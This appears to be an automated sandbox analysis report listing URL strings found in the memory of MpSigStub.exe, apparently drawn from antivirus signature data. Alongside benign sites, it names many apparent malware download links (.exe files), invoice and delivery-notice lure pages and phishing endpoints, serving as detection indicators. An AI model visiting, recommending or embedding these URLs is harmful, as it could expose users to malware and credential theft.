Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.charlesboyer.it/invoice-for
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cnn.com
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/xb
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.cow-shop.nl/index4.html
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.default-search.net/search?sid=
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.desh-datenservice.de/ups-view/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.digitrends.co.ke/invoice/
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.dutty.de/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ebay.com
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.elitefinacing.com/finance
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.elitefinacing.com/service
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.empressdynasty.com/invoice-number-51356/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.en100wan.com/google.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.enerjisampiyonaku.com/logs/form.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fakhfouri.com/sales-invoice/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastclick.com
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarasana.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.flvpro.com/?aff=
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.ggt.int.pld
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.cn/p/?q=
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldentech.co.kr
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/search?complete=1&q=%s
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.gratisweb.com/vaisefuder00
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.greyhathacker.net/tools/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.hasandanalioglu.com/wp-content/n_v/
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://www.hebogo.com/ac
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.icq.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.icservic.com/proxy/proxy.pac?id=moteur2
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://www.ilikeclick.com/track/click.php?dts_code=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.ischrome.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp	String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://www.jafiduto.cz/images/wordpress.php
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.jeegtube.com/databack.php
